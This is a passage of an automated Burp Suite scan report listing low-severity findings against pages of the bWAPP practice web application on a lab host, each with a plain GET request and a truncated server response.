    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/htmli_get.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/htmli_get.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/portal.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:31 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13242

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.59. http://192.168.52.147/bWAPP/htmli_post.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/htmli_post.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/htmli_post.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13333

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.60. http://192.168.52.147/bWAPP/htmli_stored.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/htmli_stored.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/htmli_stored.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 14128

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.61. http://192.168.52.147/bWAPP/http_response_splitting.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/http_response_splitting.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/http_response_splitting.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/smgmt_admin_portal.php?admin=1
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:56:56 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12977

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Arc
    ...[SNIP]...
    18.62. http://192.168.52.147/bWAPP/http_verb_tampering.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/http_verb_tampering.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/http_verb_tampering.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/unrestricted_file_upload.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:55:31 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13382

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.63. http://192.168.52.147/bWAPP/iframei.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/iframei.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/iframei.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:58:47 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.64. http://192.168.52.147/bWAPP/images/

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/images/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/images/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:17 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 4906
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/images</title>
    </head>
    <body>
    <h1>Index of /bWAPP/images</h1>
    <table><tr><th><img src="/icons/blank.gi
    ...[SNIP]...
    18.65. http://192.168.52.147/bWAPP/images/file.txt

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/images/file.txt

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/images/file.txt HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/unrestricted_file_upload.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:55:01 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Fri, 09 Mar 2018 02:55:00 GMT
    ETag: "8c040-18-566f1eb09e900"
    Accept-Ranges: bytes
    Content-Length: 24
    Connection: close
    Content-Type: text/plain

    555-555-0199@example.com
    18.66. http://192.168.52.147/bWAPP/images/spider.swf

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/images/spider.swf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/images/spider.swf HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/unrestricted_file_upload.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Cookie: security_level=0; secret=QW55IGJ1Z3M%2F; PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:55:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Fri, 09 Mar 2018 02:55:10 GMT
    ETag: "8c04a-13e0e1-566f1eba27f80"
    Accept-Ranges: bytes
    Content-Length: 1302753
    Connection: close
    Content-Type: application/x-shockwave-flash

    CWS    ....x.|..P.....C .....!x.@...........!..;.w'.....{..W..m.........g..z...9.....L.....L..........t...dhlcL....C..5t...kv....h.K?R..V.. ..xk.c.b..`.7!g{...u...........=..z.?.B``.A7`.....A..t.    f...}
    ...[SNIP]...
    18.67. http://192.168.52.147/bWAPP/info.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/info.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/info.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/login.php
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:17 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 3426
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Arc
    ...[SNIP]...
    18.68. http://192.168.52.147/bWAPP/information_disclosure_1.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/information_disclosure_1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/information_disclosure_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12983


    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?fami
    ...[SNIP]...
    18.69. http://192.168.52.147/bWAPP/information_disclosure_2.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/information_disclosure_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/information_disclosure_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12978

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.70. http://192.168.52.147/bWAPP/information_disclosure_3.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/information_disclosure_3.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/information_disclosure_3.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13744

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/cs
    ...[SNIP]...
    18.71. http://192.168.52.147/bWAPP/information_disclosure_4.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/information_disclosure_4.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/information_disclosure_4.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12978

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.72. http://192.168.52.147/bWAPP/insecure_crypt_storage_1.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_crypt_storage_1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insecure_crypt_storage_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13042

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.73. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_crypt_storage_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insecure_crypt_storage_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13259

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Arc
    ...[SNIP]...
    18.74. http://192.168.52.147/bWAPP/insecure_crypt_storage_3.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_crypt_storage_3.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insecure_crypt_storage_3.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/ssii.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:54:40 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: secret=QW55IGJ1Z3M%2F; expires=Fri, 09-Mar-2018 03:54:40 GMT; path=/
    Connection: close
    Content-Type: text/html
    Content-Length: 12772

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.75. http://192.168.52.147/bWAPP/insecure_direct_object_ref_1.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_direct_object_ref_1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insecure_direct_object_ref_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13380

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.76. http://192.168.52.147/bWAPP/insecure_direct_object_ref_2.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_direct_object_ref_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insecure_direct_object_ref_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13302

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.77. http://192.168.52.147/bWAPP/insecure_direct_object_ref_3.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_direct_object_ref_3.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insecure_direct_object_ref_3.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
